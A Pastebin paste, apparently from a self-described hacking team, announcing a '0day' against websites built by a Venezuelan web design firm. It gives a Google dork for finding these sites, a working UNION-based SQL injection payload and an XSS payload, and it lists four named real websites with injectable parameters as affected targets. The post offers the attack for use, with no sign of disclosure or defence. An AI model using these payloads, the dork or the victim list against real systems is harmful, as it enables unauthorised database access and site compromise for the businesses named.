API tools faq
paste
diego123

0Day - www.tuwebvenezuela.com - SQLi / XSS Injection

diego123
Dec 1st, 2012
90
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.67 KB | None | 0 0
raw download clone embed print report
  1. ___ ___ ___ ___ _
  2. | _| _ |_ | _____ ____ _ ____ ____ | _| _____ |_ | _ _ | |_ ____ _ ____ ____
  3. | | | | | || _ || __|| || _ \ | __| | | | _ | | || | | || _| | ___|| || _ \ | __|
  4. | | | | | || | | ||__ \| || | | || __| | | | |_| | | || | | || | |__ \| || | | || __|
  5. | |_ |_| _| || | | | __| || || |_| || |__ | |_ |_____| _| || |_| || |__ __| || || |_| || |__
  6. |___| |___||_| |_||____||_||____/ |____| |___| |___||_____||____||____||_||____/ |____|
  7.  
  8. ##############################################################################################
  9. # ZERO - DAY BY [!]INSIDE[0]UTSIDE~TEAM @insid30utsid3 #HACKED! #
  10. # visite [www.inside0utside.com] para mas informacion #
  11. # ~ [Maximus_Well] ~ [3sc0rp10n] - [Sr Xaoc] ~ #
  12. ##############################################################################################
  13.  
  14.  
  15. ######################################
  16. # => Author: Diego_Asencio
  17. # => Twitter: @Diego_Asencio
  18. # => Linea: Gray Hat
  19. # => WorkGroup: [!]nside [0]utside
  20. # => WebSite: www.inside0utside.com
  21. # => Consultor Independiente <=
  22. ######################################
  23. # => Dork: intext:Diseño y Programación Tu Web Venezuela
  24. # => Vendor: http://www.tuwebvenezuela.com/
  25. # => Title: www.tuwebvenezuela.com - SQLi Injection / XSS Injection
  26. ######################################
  27.  
  28.  
  29. #### INFORMACION ####
  30.  
  31. LA EMPRESA www.tuwebvenezuela.com DESARROLLA SITIOS WEB DE PROGRAMACION DINAMICA (PHP-MYSQL) LOS CUALES PERMITEN EN SU MAYORIA UNA INYECCION DE XSS y SQL EN SU BASE DE DATOS PERMITIENDO AL ATACANTE TENER ACCESO SOBRE EL SISTEMA AFECTADO
  32.  
  33. ### END INFO ###
  34.  
  35. ### XPL ###
  36.  
  37. [SQLi]
  38.  
  39. union+all+select+0,1,2,3,4,5,6,7,8,9--
  40.  
  41. Payload: id=-4543 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,105,118,122,58),IFNULL(CAST(CHAR(77,83,114,107,100,88,70,82,72,115) AS CHAR),CHAR(32)),CHAR(58,118,103,116,58))
  42.  
  43. [XSS]
  44.  
  45. "><img src=http://www.inside0utside.com/logo.jpg onerror=alert("[!]nside [0]utside");>
  46.  
  47.  
  48. http://www.localhost.com/vernoticias.php?id=[SQLi]
  49.  
  50. http://www.localhost.com/vernoticias.php?id=[XSS]
  51.  
  52.  
  53. ### END XPL ###
  54.  
  55. ### WEBSITES AFFECTES ###
  56.  
  57. http://www.tusaludvascular.com/vernoticias.php?id=6'
  58.  
  59. http://www.feposor.com.ve/vernoticias.php?id=67'
  60.  
  61. http://www.sousasupply.com/productos.php?categoria=23'
  62.  
  63. http://www.asesoriatotal.com.ve/vernoticia.php?Id=89
  64.  
  65. ### END WEBSITES AFFECTES ###
  66.  
  67.  
  68. ############# SALUDOS ##############
  69.  
  70. => MAXIMUS WELL
  71. => SR XAOC
  72. => 3SC0RP10N
  73. => R4Z0R_BL4CK
  74.  
  75. ####################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!